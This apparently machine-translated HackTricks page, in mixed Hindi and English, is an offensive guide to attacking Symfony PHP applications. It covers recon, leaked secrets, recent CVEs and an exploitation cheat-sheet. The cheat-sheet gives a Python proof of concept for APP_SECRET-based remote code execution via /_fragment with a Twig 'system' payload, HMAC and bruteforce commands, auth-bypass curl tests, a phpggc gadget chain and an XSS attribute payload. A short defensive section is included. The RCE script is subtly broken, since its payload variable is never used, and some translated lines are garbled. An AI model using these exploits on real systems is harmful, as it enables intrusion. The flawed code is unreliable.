Symfony

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components). This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.

Historical note: A large part of the ecosystem still runs the 5.4 LTS branch (EOL November 2025). Symfony 7.4 became the new LTS in Nov 2025 and will receive security fixes until Nov 2029. Always verify the exact patch-level because many 2024‑2026 advisories were fixed only in micro releases.

Recon & Enumeration

Finger-printing

  • HTTP response headers: X-Powered-By: Symfony, X-Debug-Token, X-Debug-Token-Link or cookies starting with sf_redirect, sf_session, MOCKSESSID.
  • Source code leaks (composer.json, composer.lock, /vendor/…) often reveal the exact version:
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
  • Public routes that only exist on Symfony:
  • /_profiler (Symfony Profiler & debug toolbar)
  • /_wdt/<token> (“Web Debug Toolbar”)
  • /_error/{code}.{_format} (pretty error pages)
  • /app_dev.php, /config.php, /config_dev.php (pre-4.0 dev front-controllers)
  • Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: symfony.txt → look for /_fragment, /_profiler, .env, .htaccess.

Interesting files & endpoints

पथक्यों महत्वपूर्ण है
/.env, /.env.local, /.env.prodFrequently mis-deployed → leaks APP_SECRET, DB creds, SMTP, AWS keys
/.git, .svn, .hgSource disclosure → credentials + business logic
/var/log/*.log, /log/dev.logWeb-root mis-configuration exposes stack-traces
/_profilerFull request history, configuration, service container, APP_SECRET (≤ 3.4)
/_fragmentEntry point used by ESI/HInclude. Abuse possible once you know APP_SECRET
/vendor/phpunit/phpunit/phpunitPHPUnit RCE if accessible (CVE-2017-9841)
/index.php/_error/{code}Finger-print & sometimes leak exception traces

High-impact Vulnerabilities

1. APP_SECRET disclosure ➜ RCE via /_fragment (aka “secret-fragment”)

  • CVE-2019-18889 originally, but still appears on modern targets when debug is left enabled or .env is exposed.
  • Once you know the 32-char APP_SECRET, craft an HMAC token and abuse the internal render() controller to execute arbitrary Twig:
# PoC – requires the secret
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}"   # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
  • Excellent write-up & exploitation script: Ambionics blog (linked in References).

2. PATH_INFO auth bypass – CVE-2025-64500 (HttpFoundation)

  • Affects versions below 5.4.50, 6.4.29 and 7.3.7. Path normalization could drop the leading /, breaking access-control rules that assume /admin etc.
  • Quick test: curl -H 'PATH_INFO: admin/secret' https://target/index.php → if it reaches admin routes without auth, you found it.
  • Patch by upgrading symfony/http-foundation or the full framework to the fixed patch level.

3. MSYS2/Git-Bash argument mangling – CVE-2026-24739 (Process)

  • Affects versions below 5.4.51, 6.4.33, 7.3.11, 7.4.5 and 8.0.5 on Windows when PHP is run from MSYS2 (Git-Bash, mingw). Process fails to quote = leading to corrupted paths; destructive commands (rmdir, del) may target unintended dirs.
  • If you can upload a PHP script or influence Composer/CLI helpers that call Process, craft arguments with = (e.g. E:/=tmp/delete) to cause path re-write.

4. Runtime env/argv injection – CVE-2024-50340 (Runtime)

  • When register_argv_argc=On and using non-SAPI runtimes, crafted query strings could flip APP_ENV/APP_DEBUG via argv parsing. Patched in 5.4.46/6.4.14/7.1.7.
  • Look for /?--env=prod or similar being accepted in logs.

5. URL validation / open redirect – CVE-2024-50345 (HttpFoundation)

  • Special characters in the URI were not validated the same way browsers do, enabling redirect to attacker-controlled domains. Fixed in 5.4.46/6.4.14/7.1.7.

6. Symfony UX attribute injection – CVE-2025-47946

  • symfony/ux-twig-component & symfony/ux-live-component before 2.25.1 render {{ attributes }} without escaping → attribute injection/XSS. If the app lets users define component attributes (admin CMS, email templating) you can chain to script injection.
  • Update both packages to 2.25.1+. As a manual exploit, place JS in an attribute value passed to a custom component and trigger rendering.

7. Windows Process Hijack – CVE-2024-51736 (Process)

  • The Process component searched the current working directory before PATH on Windows. An attacker able to upload tar.exe, cmd.exe, etc. in a writable web-root and trigger Process (e.g. file extraction, PDF generation) gains command execution.
  • Patched in 5.4.50, 6.4.14, 7.1.7.

8. Session-Fixation – CVE-2023-46733

  • Authentication guard reused an existing session ID after login. If an attacker sets the cookie before the victim authenticates, they hijack the account post-login.

9. Twig sandbox XSS – CVE-2023-46734

  • In applications that expose user-controlled templates (admin CMS, email builder) the nl2br filter could be abused to bypass the sandbox and inject JS.

10. Symfony 1 gadget chains (still found in legacy apps)

  • phpggc symfony/1 system id produces a Phar payload that triggers RCE when an unserialize() happens on classes such as sfNamespacedParameterHolder. Check file-upload endpoints and phar:// wrappers.

PHP - Deserialization + Autoload Classes

Exploitation Cheat-Sheet

Calculate HMAC token for /_fragment

python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs     = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"

Bruteforce कमजोर APP_SECRET

cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target

एक्सपोज्ड Symfony Console के माध्यम से RCE

यदि bin/console php-fpm के माध्यम से या सीधे CLI अपलोड के द्वारा पहुँच योग्य है:

php bin/console about        # confirm it works
php bin/console cache:clear --no-warmup

cache directory के अंदर deserialization gadgets का उपयोग करें या एक दुर्भावनापूर्ण Twig template लिखें जो अगले अनुरोध पर निष्पादित होगा।

PATH_INFO bypass को जल्दी जाँचें (CVE-2025-64500)

curl -i -H 'PATH_INFO: admin/secret' https://target/index.php
# If it returns protected content without redirect/auth, the Request normalization is vulnerable.

Spray UX attribute injection (CVE-2025-47946)

{# attacker-controlled attribute value #}
<live:button {{ attributes|merge({'onclick':'alert(1)'}) }} />

यदि रेंडर किया गया आउटपुट attribute को बिना escape किए echo करता है, तो XSS सफल होगा। 2.25.1+ में patch करें।

रक्षा संबंधी नोट्स

  1. Never deploy debug (APP_ENV=dev, APP_DEBUG=1) को production में कभी deploy न करें; web-server config में /app_dev.php, /_profiler, /_wdt को block करें।
  2. Secrets को env vars या vault/secrets.local.php में रखें, document-root से पहुँच योग्य फाइलों में कभी भी न रखें।
  3. Patch management को लागू रखें – Symfony security advisories को subscribe करें और कम से कम LTS patch-level बनाए रखें (5.4.x until Nov 2025, 6.4 until Nov 2027, 7.4 until Nov 2029)।
  4. यदि आप Windows पर चलाते हैं, तो CVE-2024-51736 & CVE-2026-24739 को कम करने के लिए तुरंत upgrade करें या defence-in-depth के लिए open_basedir/disable_functions जोड़ें।

उपयोगी आक्रामक टूलिंग

  • ambionics/symfony-exploits – secret-fragment RCE, debugger routes की खोज।
  • phpggc – Symfony 1 & 2 के लिए Ready-made gadget chains।
  • sf-encoder_fragment HMAC compute करने में छोटा helper (Go implementation)。

References

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें